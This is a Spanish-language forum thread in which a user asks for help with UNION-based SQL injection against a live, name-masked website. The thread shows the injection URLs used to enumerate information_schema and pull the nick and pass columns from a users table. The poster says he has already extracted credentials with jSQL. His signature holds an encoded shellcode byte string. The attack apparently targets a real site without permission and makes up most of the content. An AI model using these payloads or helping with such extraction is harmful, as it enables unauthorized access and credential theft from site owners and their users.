Autor
|
Tema: Duda MYSQL injection - "Unknown column 'nick' in 'field list'" (Leído 3,620 veces)
|
Paniic
Desconectado
Mensajes: 32
\x90\x90\x90
|
Tras terminar de estudiar SQL me he puesto a practicar con SQLi y con mi primera web ya he tenido un problema que me desconcierta. http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+53,1--Encuentro la tabla usuarioshttp://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=char(117,115,117,097,114,105,111)-- Me muestra id,nick,pass,nombre,mail,fecha http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,concat(nick,0x3a,pass),7,8,9,10,11+from+information_schema.columns+where+table_name=char(117,115,117,097,114,105,111)-- Me muestra Falló la consulta.1054: Unknown column 'nick' in 'field list' ¿Porque me dice que no lo encuentra si anteriormente me da todas las columnas de dicha tabla? Saludos y gracias
|
|
« Última modificación: 24 Agosto 2014, 19:31 pm por paniicO »
|
En línea
|
\x31\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e\x10\xdb\x16\x83\xeb\xfc\xe2\xf4\x6f\xcb\x88\x55\x0d\x7a\xd9\x7c\x38\x48\x52\xf7\x93\x90\x48\x4f\xee\x2f\x16\x96\x17\x69\x22\x4d\x04\x78\xd1\x16\x5e\x89\xbd\x7e\x79\x1f\x98\x70\x0d\x99\x3a\xa6\x38\x40\x8a\x45\xd7\xf1\x98\xdb\xde\x42\xb3\x39\x71\x63\xb3\x7e\x71\x72\xb2\x78\xd7\xf3\x89\x45\xd7\xf1\x6b\x1d\x93\x90\xdb\x16
|
|
|
dRak0
|
Si realmente estudiaste SQL , fijate la ultima consulta que realizas.
|
|
|
En línea
|
|
|
|
Paniic
Desconectado
Mensajes: 32
\x90\x90\x90
|
Si realmente estudiaste SQL , fijate la ultima consulta que realizas.
He avanzado algo. http://www.***.com/index.php?accion=11&id=-1+UNION+SELECT+1,2,3,4,5,concat(nick,0x3a,pass),7,8,9,10,11+from+usuario-- Pero me dice: Falló la consulta.1146: Table '***_ocio.usuario' doesn't existY es que "usuario" no está en esta bd, sino en ***_users.usuario Entiendo el error, pero no consigo saber como acceder a la base de datos _users y no a _ocio. Gracias por la pista ! PD: Ya tengo el nick y el pass que he sacado con jSQL pero quiero entender como hacerlo mediante url.
|
|
|
En línea
|
\x31\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e\x10\xdb\x16\x83\xeb\xfc\xe2\xf4\x6f\xcb\x88\x55\x0d\x7a\xd9\x7c\x38\x48\x52\xf7\x93\x90\x48\x4f\xee\x2f\x16\x96\x17\x69\x22\x4d\x04\x78\xd1\x16\x5e\x89\xbd\x7e\x79\x1f\x98\x70\x0d\x99\x3a\xa6\x38\x40\x8a\x45\xd7\xf1\x98\xdb\xde\x42\xb3\x39\x71\x63\xb3\x7e\x71\x72\xb2\x78\xd7\xf3\x89\x45\xd7\xf1\x6b\x1d\x93\x90\xdb\x16
|
|
|
|
|